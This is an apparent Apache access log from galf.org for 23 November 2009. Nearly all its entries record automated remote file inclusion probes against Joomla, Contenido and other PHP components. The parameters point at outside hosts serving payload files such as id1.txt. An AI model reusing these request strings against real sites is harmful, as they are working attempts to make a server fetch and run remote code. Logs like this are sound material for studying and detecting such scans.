195.186.64.163 - - [23/Nov/2009:01:35:04 -0800] "GET /logs/access_090831.log//setup.php?dir=http://cbnumed.or.kr/bbs/enda-id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.111.29 - - [23/Nov/2009:01:35:41 -0800] "GET /logs/?N=A HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:01:36:08 -0800] "GET /components/com_booklibrary/doc/releasenote.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:01:36:08 -0800] "GET /logs//components/com_booklibrary/doc/releasenote.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:01:36:09 -0800] "GET /logs/access_090615.log//components/com_booklibrary/doc/releasenote.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [23/Nov/2009:01:36:09 -0800] "GET /logs/access_090622.log///registration_detailed.inc.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.112.174 - - [23/Nov/2009:01:36:13 -0800] "GET /logs/access.log///registration_detailed.inc.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.125.107.130 - - [23/Nov/2009:01:39:19 -0800] "GET /logs/access_090525.log///registration_detailed.inc.php?mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs///skin/happycast_category_lightblack/robots.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.107.130 - - [23/Nov/2009:01:41:49 -0800] "GET /logs/access_090309.log///registration_detailed.inc.php?mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs///skin/happycast_category_lightblack/robots.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.107.130 - - [23/Nov/2009:01:41:49 -0800] "GET /logs/access_091019.log///registration_detailed.inc.php?mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs///skin/happycast_category_lightblack/robots.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:01:43:39 -0800] "GET /components/com_booklibrary/doc/releasenote.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:01:43:39 -0800] "GET /logs/access_090615.log//components/com_booklibrary/doc/releasenote.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:01:43:39 -0800] "GET /logs//components/com_booklibrary/doc/releasenote.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.107.130 - - [23/Nov/2009:01:43:40 -0800] "GET /logs/access_090622.log///registration_detailed.inc.php?mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs///skin/happycast_category_lightblack/robots.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.107.130 - - [23/Nov/2009:01:43:46 -0800] "GET /logs/access.log///registration_detailed.inc.php?mosConfig_absolute_path=http://emwave.knu.ac.kr/bbs///skin/happycast_category_lightblack/robots.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.129.64.89 - - [23/Nov/2009:01:49:21 -0800] "GET /logs/access_090824.log//?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [23/Nov/2009:01:49:21 -0800] "GET /logs//?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [23/Nov/2009:01:49:21 -0800] "GET /?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [23/Nov/2009:01:49:41 -0800] "GET /logs/access_090824.log%20%20//?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [23/Nov/2009:01:50:18 -0800] "GET /logs/access_091019.log%20%20//?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.71.237.150 - - [23/Nov/2009:01:50:19 -0800] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
200.71.237.150 - - [23/Nov/2009:01:50:19 -0800] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
61.129.64.89 - - [23/Nov/2009:01:54:43 -0800] "GET /logs/access_090330.log//?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [23/Nov/2009:01:54:43 -0800] "GET /logs/access_090720.log//?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.100.117.230 - - [23/Nov/2009:01:56:30 -0800] "GET /logs/access_091012.log//index.php?DOCUMENT_ROOT=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [23/Nov/2009:01:57:50 -0800] "GET /include/lib.inc.php?site_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [23/Nov/2009:01:57:50 -0800] "GET /logs/access_090914.log%20%20//include/lib.inc.php?site_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [23/Nov/2009:01:57:50 -0800] "GET /logs//include/lib.inc.php?site_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [23/Nov/2009:01:57:55 -0800] "GET /include/lib.inc.php?site_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [23/Nov/2009:01:57:55 -0800] "GET /logs/access_090914.log%20%20//include/lib.inc.php?site_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [23/Nov/2009:01:57:55 -0800] "GET /logs//include/lib.inc.php?site_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:01:59:33 -0800] "GET /logs/access.log//?GLOBALS[binn_include_path]=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:01:59:34 -0800] "GET /logs/access_090511.log//?GLOBALS[binn_include_path]=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:01:59:35 -0800] "GET /?GLOBALS[binn_include_path]=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:01:59:35 -0800] "GET /logs//?GLOBALS[binn_include_path]=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
200.174.230.240 - - [23/Nov/2009:02:01:12 -0800] "GET /logs/access_091102.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/11/3/2634841/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
200.174.230.240 - - [23/Nov/2009:02:01:13 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/11/3/2634841/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
200.174.230.240 - - [23/Nov/2009:02:01:13 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.fileden.com/files/2009/11/3/2634841/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
94.79.54.195 - - [23/Nov/2009:02:02:05 -0800] "GET /logs/access_090518.log%20%20/?sourcedir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [23/Nov/2009:02:02:05 -0800] "GET /logs/?sourcedir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.0" 200 4926 "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [23/Nov/2009:02:02:05 -0800] "GET /?sourcedir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.0" 200 1032 "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [23/Nov/2009:02:02:25 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [23/Nov/2009:02:03:03 -0800] "GET /include/lib.inc.php?site_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [23/Nov/2009:02:03:03 -0800] "GET /logs//include/lib.inc.php?site_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
157.100.230.82 - - [23/Nov/2009:02:03:04 -0800] "GET /logs/access_090504.log//include/lib.inc.php?site_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [23/Nov/2009:02:03:32 -0800] "GET /logs/access_090518.log/?sourcedir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [23/Nov/2009:02:06:40 -0800] "GET /?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/aisatriani/paket/safe.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
157.100.230.82 - - [23/Nov/2009:02:07:47 -0800] "GET /logs/access_090622.log//include/lib.inc.php?site_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [23/Nov/2009:02:07:49 -0800] "GET /logs/access_090504.log//include/lib.inc.php?site_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [23/Nov/2009:02:12:10 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [23/Nov/2009:02:12:10 -0800] "GET /logs/access_090629.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [23/Nov/2009:02:12:10 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
117.74.98.18 - - [23/Nov/2009:02:12:13 -0800] "GET /logs/access_090706.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://imtelkom.ac.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [23/Nov/2009:02:12:15 -0800] "GET /logs/access_090615.log/?sourcedir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [23/Nov/2009:02:14:31 -0800] "GET /logs/access_090427.log/?sourcedir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [23/Nov/2009:02:17:52 -0800] "GET /logs/access_091019.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [23/Nov/2009:02:17:52 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [23/Nov/2009:02:17:52 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [23/Nov/2009:02:18:02 -0800] "GET /logs/access_090928.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [23/Nov/2009:02:18:12 -0800] "GET /logs/access_091019.log////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [23/Nov/2009:02:18:12 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [23/Nov/2009:02:18:12 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [23/Nov/2009:02:18:14 -0800] "GET /logs/access_090928.log////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:02:18:26 -0800] "GET /include/write.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:02:18:26 -0800] "GET /logs//include/write.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:02:18:26 -0800] "GET /logs/access_090309.log%20%20//include/write.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:02:19:22 -0800] "GET /logs/access_090525.log%20%20//include/write.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:20:09 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:20:09 -0800] "GET /logs/access.log//home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:20:09 -0800] "GET /logs//home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:20:12 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:20:12 -0800] "GET /logs/access.log//home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:20:12 -0800] "GET /logs//home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:20:13 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:20:13 -0800] "GET /logs/access.log//home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:20:13 -0800] "GET /logs//home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:20:25 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:20:25 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:20:25 -0800] "GET /logs/access.log///conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:20:51 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:20:51 -0800] "GET /logs/access.log///conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:20:51 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:20:54 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:20:54 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:20:54 -0800] "GET /logs/access.log///conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [23/Nov/2009:02:20:55 -0800] "GET /index.php?redir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:02:20:55 -0800] "GET /logs/index.php?redir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:02:20:55 -0800] "GET /logs/access.log%20%20/index.php?redir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:20:57 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:20:57 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:20:57 -0800] "GET /logs/access.log///conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:03 -0800] "GET /logs/access.log///conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:03 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:03 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "galf.org"
114.108.177.238 - - [23/Nov/2009:02:21:07 -0800] "GET /logs/access_090720.log%20%20/index.php?redir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:09 -0800] "GET /logs//home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:09 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:10 -0800] "GET /logs/access.log//home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:10 -0800] "GET /logs/access.log//home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:10 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:10 -0800] "GET /logs//home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:22 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:22 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:23 -0800] "GET /logs/access.log///conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:31 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:31 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:31 -0800] "GET /logs/access.log///conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "galf.org"
114.108.177.238 - - [23/Nov/2009:02:21:35 -0800] "GET /index.php?redir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:02:21:35 -0800] "GET /logs/access.log%20%20/index.php?redir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:02:21:35 -0800] "GET /logs/index.php?redir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:41 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:41 -0800] "GET /logs/access.log//home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:41 -0800] "GET /logs//home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "galf.org"
